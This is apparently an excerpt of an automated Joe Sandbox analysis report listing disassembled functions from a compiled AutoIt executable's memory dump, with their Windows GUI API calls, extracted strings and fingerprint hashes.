                            Function 00D468DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                            • API String ID: 1038674560-86951937
                            • Opcode ID: 5dd69e393bce407c6eaebed5e3bd51e917239aa56a6f792e91eed33736f5a8b2
                            • Instruction ID: 8c9274862788300d10e81c4e2726d690bb300042fb31ab479909214c64080400
                            • Opcode Fuzzy Hash: 5dd69e393bce407c6eaebed5e3bd51e917239aa56a6f792e91eed33736f5a8b2
                            • Instruction Fuzzy Hash: EF81E4B0600605BBCF20AB64EC43FBB3769EF16705F084025F946AB196EB71DE45D6B2
                            Function 00DC9A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                            Download Yara Rule
                            APIs
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103), ref: 00DC9AD2
                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00DC9B8B
                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 00DC9BA7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$Window
                            • String ID: 0
                            • API String ID: 2326795674-4108050209
                            • Opcode ID: 7ea6ce194327e9d2427272e4fa0520e5b85c9adbc40a39e67ad11017800e8ef7
                            • Instruction ID: 7de86a92f9e1c08d6e11cc045db8d43b5b2578c65c45569c9742844ff7f29309
                            • Opcode Fuzzy Hash: 7ea6ce194327e9d2427272e4fa0520e5b85c9adbc40a39e67ad11017800e8ef7
                            • Instruction Fuzzy Hash: D602AB31105302AFDB258F24C869FAABBE5FF49314F08892DF999D72A1C735D944CB62
                            Function 00DCA8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,00DCA5FA,?,?,00000000,?), ref: 00DCA903
                            • SetTextColor.GDI32(?,?), ref: 00DCA907
                            • GetSysColorBrush.USER32 ref: 00DCA91D
                            • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,00DCA5FA,?,?,00000000,?,?), ref: 00DCA928
                            • CreateSolidBrush.GDI32(?), ref: 00DCA92D
                            • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,00DCA5FA,?,?,00000000,?,?), ref: 00DCA945
                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DCA953
                            • SelectObject.GDI32(?,00000000), ref: 00DCA964
                            • SetBkColor.GDI32(?,00000000), ref: 00DCA96D
                            • SelectObject.GDI32(?,?), ref: 00DCA97A
                            • InflateRect.USER32 ref: 00DCA999
                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DCA9B0
                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00DCA9C5
                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DCA9ED
                            • GetWindowTextW.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,00DCA5FA,?,?,00000000,?,?), ref: 00DCAA14
                            • InflateRect.USER32 ref: 00DCAA32
                            • DrawFocusRect.USER32 ref: 00DCAA3D
                            • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,00DCA5FA), ref: 00DCAA4B
                            • SetTextColor.GDI32(?,00000000), ref: 00DCAA53
                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00DCAA67
                            • SelectObject.GDI32(?,00DCA5FA), ref: 00DCAA7E
                            • DeleteObject.GDI32(?), ref: 00DCAA89
                            • SelectObject.GDI32(?,?), ref: 00DCAA8F
                            • DeleteObject.GDI32(?), ref: 00DCAA94
                            • SetTextColor.GDI32(?,?), ref: 00DCAA9A
                            • SetBkColor.GDI32(?,?), ref: 00DCAAA4
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                            • String ID:
                            • API String ID: 1996641542-0
                            • Opcode ID: 4bc5ef142fa764e3cd2a0057d3e934bd1d367abed7ea2a449f0c2dc08272458c
                            • Instruction ID: c8d23bfbe7408acec8557eed437dbf42c72ff0dd4d307d743b1623ea3b71c86e
                            • Opcode Fuzzy Hash: 4bc5ef142fa764e3cd2a0057d3e934bd1d367abed7ea2a449f0c2dc08272458c
                            • Instruction Fuzzy Hash: 72512C7190021AEFDB119FA8DC49EEE7B7AEF08320F154625F911EB2A1D7719940DFA0
                            Function 00DC89D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00DC8AC1
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DC8AD2
                            • CharNextW.USER32(0000014E), ref: 00DC8B01
                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00DC8B42
                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00DC8B58
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DC8B69
                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00DC8B86
                            • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 00DC8BD8
                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00DC8BEE
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DC8C1F
                            • _memset.LIBCMT ref: 00DC8C44
                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00DC8C8D
                            • _memset.LIBCMT ref: 00DC8CEC
                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00DC8D16
                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00DC8D6E
                            • SendMessageW.USER32(?,0000133D,?,?), ref: 00DC8E1B
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00DC8E3D
                            • GetMenuItemInfoW.USER32 ref: 00DC8E87
                            • SetMenuItemInfoW.USER32 ref: 00DC8EB4
                            • DrawMenuBar.USER32(?), ref: 00DC8EC3
                            • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 00DC8EEB
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                            • String ID: 0
                            • API String ID: 1073566785-4108050209
                            • Opcode ID: a5509f139724a8b207792780a658f10aadfc492a0144f2fa0b0f26e8ef17801a
                            • Instruction ID: 88b9fcee3506e46abfedda6dc20f595f82c55957b9225b64b77d43149e377e82
                            • Opcode Fuzzy Hash: a5509f139724a8b207792780a658f10aadfc492a0144f2fa0b0f26e8ef17801a
                            • Instruction Fuzzy Hash: 50E15B7190021AAFDB219F64CC84FEE7BB9EF05710F14815AF955AB290DB708A81EF70
                            Function 00DC488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetCursorPos.USER32(?), ref: 00DC49CA
                            • GetDesktopWindow.USER32 ref: 00DC49DF
                            • GetWindowRect.USER32(00000000), ref: 00DC49E6
                            • GetWindowLongW.USER32(?,000000F0), ref: 00DC4A48
                            • DestroyWindow.USER32 ref: 00DC4A74
                            • CreateWindowExW.USER32 ref: 00DC4A9D
                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DC4ABB
                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00DC4AE1
                            • SendMessageW.USER32(?,00000421,?,?), ref: 00DC4AF6
                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00DC4B09
                            • IsWindowVisible.USER32(?), ref: 00DC4B29
                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00DC4B44
                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00DC4B58
                            • GetWindowRect.USER32(?,?), ref: 00DC4B70
                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00DC4B96
                            • GetMonitorInfoW.USER32(00000000,?), ref: 00DC4BB0
                            • CopyRect.USER32(?,?), ref: 00DC4BC7
                            • SendMessageW.USER32(?,00000412,00000000), ref: 00DC4C32
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                            • String ID: ($0$tooltips_class32
                            • API String ID: 698492251-4156429822
                            • Opcode ID: 832fd4b49fb218067cf4d75c758498ed00e424931d614d0f6f100645a9c2aabc
                            • Instruction ID: 0ed38403d16680702b5ac67a278fa7f9980a0527e6ecbd1621c2ce564cffb090
                            • Opcode Fuzzy Hash: 832fd4b49fb218067cf4d75c758498ed00e424931d614d0f6f100645a9c2aabc
                            • Instruction Fuzzy Hash: A0B17970604342AFDB04DF65C898F6ABBE5EF88314F008A1CF5999B2A1D771EC05CB65
                            Function 00DA449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                            Download Yara Rule
                            APIs
                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00DA44AC
                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00DA44D2
                            • _wcscpy.LIBCMT ref: 00DA4500
                            • _wcscmp.LIBCMT ref: 00DA450B
                            • _wcscat.LIBCMT ref: 00DA4521
                            • _wcsstr.LIBCMT ref: 00DA452C
                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00DA4548
                            • _wcscat.LIBCMT ref: 00DA4591
                            • _wcscat.LIBCMT ref: 00DA4598
                            • _wcsncpy.LIBCMT ref: 00DA45C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                            • API String ID: 699586101-1459072770
                            • Opcode ID: 6d5c4e4ab8e3e04f1b87cf8aa32943e62184cf8079c4457412bcb874213b2ae6
                            • Instruction ID: 33c0f1ed3cb0b2d44e9bce28ca2fa43e10c14ecdeee6e7ab8937aa882466061c
                            • Opcode Fuzzy Hash: 6d5c4e4ab8e3e04f1b87cf8aa32943e62184cf8079c4457412bcb874213b2ae6
                            • Instruction Fuzzy Hash: D941D172A002157BDB11AB748C47EFF77ACDF82710F08446AF905E61C2EB75AA019AB5
                            Function 00D427D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D428BC
                            • GetSystemMetrics.USER32(00000007), ref: 00D428C4
                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D428EF
                            • GetSystemMetrics.USER32(00000008), ref: 00D428F7
                            • GetSystemMetrics.USER32(00000004), ref: 00D4291C
                            • SetRect.USER32 ref: 00D42939
                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00D42949
                            • CreateWindowExW.USER32 ref: 00D4297C
                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D42990
                            • GetClientRect.USER32(00000000,000000FF), ref: 00D429AE
                            • GetStockObject.GDI32(00000011), ref: 00D429CA
                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D429D5
                              • Part of subcall function 00D42344: GetCursorPos.USER32(?), ref: 00D42357
                              • Part of subcall function 00D42344: ScreenToClient.USER32(00E057B0,?), ref: 00D42374
                              • Part of subcall function 00D42344: GetAsyncKeyState.USER32 ref: 00D42399
                              • Part of subcall function 00D42344: GetAsyncKeyState.USER32 ref: 00D423A7
                            • SetTimer.USER32(00000000,00000000,00000028,00D41256), ref: 00D429FC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                            • String ID: AutoIt v3 GUI
                            • API String ID: 1458621304-248962490
                            • Opcode ID: 837138cb29261752982bee797e391272bbda2d0d14ffe7a4ed842dd63309f687
                            • Instruction ID: 4ac0486c0f6257269cfc4827a4dafab24b8407d0c3a48b4f6174d1609cc60f63
                            • Opcode Fuzzy Hash: 837138cb29261752982bee797e391272bbda2d0d14ffe7a4ed842dd63309f687
                            • Instruction Fuzzy Hash: 45B12A71A1020ADFDB14DFA8DC49BAE7BB5FB48310F548229FA15E6290DB74D840CB70
                            Function 00D9A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetClassNameW.USER32(?,?,00000100), ref: 00D9A47A
                            • __swprintf.LIBCMT ref: 00D9A51B
                            • _wcscmp.LIBCMT ref: 00D9A52E
                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00D9A583
                            • _wcscmp.LIBCMT ref: 00D9A5BF
                            • GetClassNameW.USER32(?,?,00000400), ref: 00D9A5F6
                            • GetDlgCtrlID.USER32 ref: 00D9A648
                            • GetWindowRect.USER32(?,?), ref: 00D9A67E
                            • GetParent.USER32(?), ref: 00D9A69C
                            • ScreenToClient.USER32(00000000), ref: 00D9A6A3
                            • GetClassNameW.USER32(?,?,00000100), ref: 00D9A71D
                            • _wcscmp.LIBCMT ref: 00D9A731
                            • GetWindowTextW.USER32(?,?,00000400), ref: 00D9A757
                            • _wcscmp.LIBCMT ref: 00D9A76B
                              • Part of subcall function 00D6362C: _iswctype.LIBCMT ref: 00D63634
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                            • String ID: %s%u
                            • API String ID: 3744389584-679674701
                            • Opcode ID: 9ed3015a4f2c33e1bdb643adba4ecd8753eb98fe2df6813f13364081ff20788d
                            • Instruction ID: 14cb67c02443f483038fd88940664e85208942fa59fca6335eafcacb0ab6766d
                            • Opcode Fuzzy Hash: 9ed3015a4f2c33e1bdb643adba4ecd8753eb98fe2df6813f13364081ff20788d
                            • Instruction Fuzzy Hash: 4BA1AE32204706ABDB14DF68C885FAAB7E8FF44314F148629E999C2190DB30E955CBF2
                            Function 00D9AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                            Download Yara Rule
                            APIs
                            • GetClassNameW.USER32(00000008,?,00000400), ref: 00D9AF18
                            • _wcscmp.LIBCMT ref: 00D9AF29
                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 00D9AF51
                            • CharUpperBuffW.USER32(?,00000000), ref: 00D9AF6E
                            • _wcscmp.LIBCMT ref: 00D9AF8C
                            • _wcsstr.LIBCMT ref: 00D9AF9D
                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00D9AFD5
                            • _wcscmp.LIBCMT ref: 00D9AFE5
                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 00D9B00C
                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00D9B055
                            • _wcscmp.LIBCMT ref: 00D9B065
                            • GetClassNameW.USER32(00000010,?,00000400), ref: 00D9B08D
                            • GetWindowRect.USER32(00000004,?), ref: 00D9B0F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                            • String ID: @$ThumbnailClass
                            • API String ID: 1788623398-1539354611
                            • Opcode ID: e277a8a7af4025c2ce570234271545a02969d003bfe7e296616e6c2729c01af0
                            • Instruction ID: 304a8d4563278cb9e60cbae8c2085199fc10bb98731c91e56bfa8cd6e6300d81
                            • Opcode Fuzzy Hash: e277a8a7af4025c2ce570234271545a02969d003bfe7e296616e6c2729c01af0
                            • Instruction Fuzzy Hash: 4481BE721083069BDF04DF14D985FAA7BE8EF44324F08846AFD899A096DB34DD49CBB1
                            Function 00DCC5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623
                            • DragQueryPoint.SHELL32(?,?), ref: 00DCC627
                              • Part of subcall function 00DCAB37: ClientToScreen.USER32(?,?), ref: 00DCAB60
                              • Part of subcall function 00DCAB37: GetWindowRect.USER32(?,?), ref: 00DCABD6
                              • Part of subcall function 00DCAB37: PtInRect.USER32(?,?,00DCC014), ref: 00DCABE6
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00DCC690
                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00DCC69B
                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00DCC6BE
                            • _wcscat.LIBCMT ref: 00DCC6EE
                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00DCC705
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00DCC71E
                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00DCC735
                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00DCC757
                            • DragFinish.SHELL32(?), ref: 00DCC75E
                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00DCC851
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb
                            • API String ID: 169749273-730855631
                            • Opcode ID: 205b8a39ffa28d96b7d4092c9204a2c197e87e3d7137ac889642f7b31a0ac8c0
                            • Instruction ID: 840e5f1b0fd06d97df7d52bfffac94ccf6d3f2d42bca7e765f92337ef3b11da6
                            • Opcode Fuzzy Hash: 205b8a39ffa28d96b7d4092c9204a2c197e87e3d7137ac889642f7b31a0ac8c0
                            • Instruction Fuzzy Hash: BE615C71508302AFC701DF64D885EAFBBE9EF88750F00092EF695932A1DB709949CB72
                            Function 00D9ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                            • API String ID: 1038674560-1810252412
                            • Opcode ID: 29d15367a65cfc86be23937b741cbdc02e52c1bc63def0fb74d4abccf074daaa
                            • Instruction ID: 36a75e4370ad36923a03292a9e1a98deb1a097c83a16a1aeede426ab50bb4ae9
                            • Opcode Fuzzy Hash: 29d15367a65cfc86be23937b741cbdc02e52c1bc63def0fb74d4abccf074daaa
                            • Instruction Fuzzy Hash: F831B036A48209AFDB00EA64DD43EFE77A4EB10710F214028F545750D6EB516F18C6B2
                            Function 00DB4FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Cursor$Load$Info
                            • String ID:
                            • API String ID: 2577412497-0
                            • Opcode ID: 802e569f4894b2599f7e2ca29f050ab015097ef284a486f04b9676856749d36d
                            • Instruction ID: 2dd8cc52c9d98ad2d01fec061432e60c7a0cd8067192492a659543e1a940eafa
                            • Opcode Fuzzy Hash: 802e569f4894b2599f7e2ca29f050ab015097ef284a486f04b9676856749d36d
                            • Instruction Fuzzy Hash: 293109B1D4831AAADF109FB69C8999FFFE8FF04750F50452AE50DE7280DA7865008FA1
                            Function 00DCA1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00DCA259
                            • DestroyWindow.USER32 ref: 00DCA2D3
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                            • CreateWindowExW.USER32 ref: 00DCA34D
                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00DCA36F
                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DCA382
                            • DestroyWindow.USER32 ref: 00DCA3A4
                            • CreateWindowExW.USER32 ref: 00DCA3DB
                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DCA3F4
                            • GetDesktopWindow.USER32 ref: 00DCA40D
                            • GetWindowRect.USER32(00000000), ref: 00DCA414
